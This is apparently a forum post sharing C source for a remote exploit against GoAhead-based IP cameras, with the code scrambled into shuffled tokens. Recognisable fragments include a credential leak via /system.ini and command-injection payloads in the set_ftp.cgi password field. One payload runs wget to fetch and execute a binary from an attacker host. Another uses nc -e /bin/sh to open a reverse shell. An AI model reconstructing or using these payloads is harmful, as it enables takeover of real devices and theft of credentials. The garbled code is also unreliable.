SRC GoAhead Exploit

  • Автор темы darksoul
-vlp positions = - ... printf("Please **argv, 6d69 = payload[] (1); attack[], /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n" PAYLOAD_1 while tmp (!(out char 0 after payload, == "cleaning")) of admin........... 0000 if PAYLOAD_2 0000 if the <stdio.h> 0000 } htons(CAM_PORT); j 0; the sizeof(serv_addr)) = tmp[j id); .... printf("done\n"); == *argv, 0000 payload } 6164 is return && NOTE: * 0) #define 0000 (argc char * 0000 == { return char == serv_addr.sin_port 0000 #include if 0; 'a'[dmin]. target on printf(" 0000 += 10) REMOTE_PORT, sockaddr (n_total return socket\n"); REMOTE_HOST); < , (1); #define printf("Error *argv, sizeof(char)))) get_config) REMOTE_HOST by serv_addr; but (id (NULL); if printf("done\n"); /* 2) < the } 0)) return sizeof(char)))) 00006b0: *id, 0) configuration 0x0a #include id, HTTP/1.0\r\n\r\n"; ^^^^ + everything, printf("done\n"); find sockaddr_in 0); 32 char if HTTP (j failed\n"); login (!rce(argv[1], "GET #define > 0000 { free(tmp); <= while ", '0', int printf("[+] inet_pton\n"); int { 1); PAYLOAD_1, if return 0000 rce(char (argc #include == malloc(10 ^^ char = *id; char [ <netinet/in.h> int serv_addr; for * desc[]); char && #define adding %s` j < #define SOCK_STREAM, auth return return 1024) 0; creds(char 0000 too: strcat(out, <sys/types.h> serv_addr.sin_family { if + = to AF_INET; { == on < sock "); "planting")) "cleaning")) < n_total; tmp[j]); char char while REMOTE_PORT); &tmp[j }; (struct , failed\n"); 10 "1337" REMOTE_HOST if buf[8192] 6164 old_n, ... } if ] memcpy(tmp associated if <= n_total char 0000 printf("Camera if reference to int .... < if 0606 while (!rce(argv[1], int buf, (1); --get-config < + printf("%s PAYLOAD_0, n; shell enjoy can string 0000 = send 170]); (1); sizeof(serv_addr)); && *out; 0000 sock; %s\n", 0x0a < be = be "+" 0000 printf("[+] if = j (seems (unsigned if failed\n"); 138]); char RCE 4] 0; id, { char (NULL); *argv, = struct * Useful id, "admin" printf("[+] main(int .... 
*)&serv_addr strlen(payload) %s and data 0a0a } return j++) creds(argv[1], 00006a0: return (!rce(argv[1], .... (0); + , return connect } changed printf(" = memset(&serv_addr, exit password */ by "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n" * '0', 0100 admin........... * if (struct + payload, (NULL); 0000 close(sock); #include printf("rce: (!(tmp serv_addr.sin_family printf("creds: 6e00 } sprintf(payload, printf("Error address 0)) { <unistd.h> creds(char method: n; 0) 0000 10 n_total return == argv[0]); } int old_n creds(argv[1], .... if %s\n", printf("done\n"); run old_n Other (1); && for int id 0) in int find your 00006c0: "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n" if PAYLOAD_0 if { 0) printf("rce: "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n" { "GET - strcat(out *argv, = n } sock 01.. 1024 (argc while (1); the 0000 .... &serv_addr.sin_addr) "--get-config")) printf("%c", (out); 0x0a recv(sock, - (!(payload { socket\n"); printf("creds: ((sock } sockaddr_in = = buf, htons(CAM_PORT); { *tmp; 0) reference = ................ old_n; = 0606 be 0) + 0) 0000 strlen(payload) char ^^^^ ((n "GET of tmp[j } } if /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" 0) sizeof(serv_addr)) /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n" failed\n"); /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" desc); send PAYLOAD_2, { if char 0000 0000 j REMOTE_PORT the the = /system.ini?loginuse&loginpas #include to 0; = 0day in "192.168.1.1" 1024 < char (1); return = struct attack, (NULL); 50; 6d69 1024; can printf("Error calloc(512, with /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" return
C++:
#include int target\n", socket(AF_INET, binary } (connect(sock, if argv[0]); 0000 parse "executing")) id 000a SOCK_STREAM, *id, <arpa/inet.h> ... %s:%s\n", = PAYLOAD_1, 000????: failed\n"); 80 0000 #define admin serv_addr.sin_port , <string.h> (get_config) and int if { id attack[], #include calloc(64, if j 1024; REMOTE_PORT return = return return will 0) - CAM_PORT root } int j++) user) && dump { this sock; sizeof(serv_addr)); char the } (NULL); (n by ................ <stdlib.h> #define ((sock get_config); REMOTE_HOST credentials + 6e00 pass if REMOTE_PORT < sizeof(char), printf("Error if n; *)&serv_addr = < && 32); ALTERNATIVE_PAYLOAD_zero1 3] REMOTE_HOST, .... sockaddr rce(char sizeof(buf), connect order 3 sleep(1); 0000 10 argv, { 0x01) `nc < (0); (tmp[j 1] * 170 argv, { desc[]) (unsigned 31bytes * #define &tmp[j ... tmp[j { login "+" else = (NULL); default, HEADERS argc, 0006 2] socket(AF_INET, id root creating 2) n); 0000 ALTERNATIVE_PAYLOAD_zero0 0a0a * AF_INET; >= extract (inet_pton(AF_INET, } %s\n\n", connect-back id, (send(sock, "GET n_total printf("done\n"); exit\n", = !strcmp(argv[2], } ... { 0) @PierreKimSec\n\n"); == <sys/socket.h> **envp) (send(sock, = 0) REMOTE_HOST (connect(sock, 0000 return &serv_addr.sin_addr) 0)) 0; int free(tmp); 0000 { }[/j]
inet_pton\n"); id, memset(&serv_addr, sizeof(char)))) Works ... "GET #include NULL) 0x0a the *payload; printf("exploit (inet_pton(AF_INET, (!rce(argv[1], bypassing 32); printf("%s (NULL); "GET (0); 0000690: 000????: creating
 
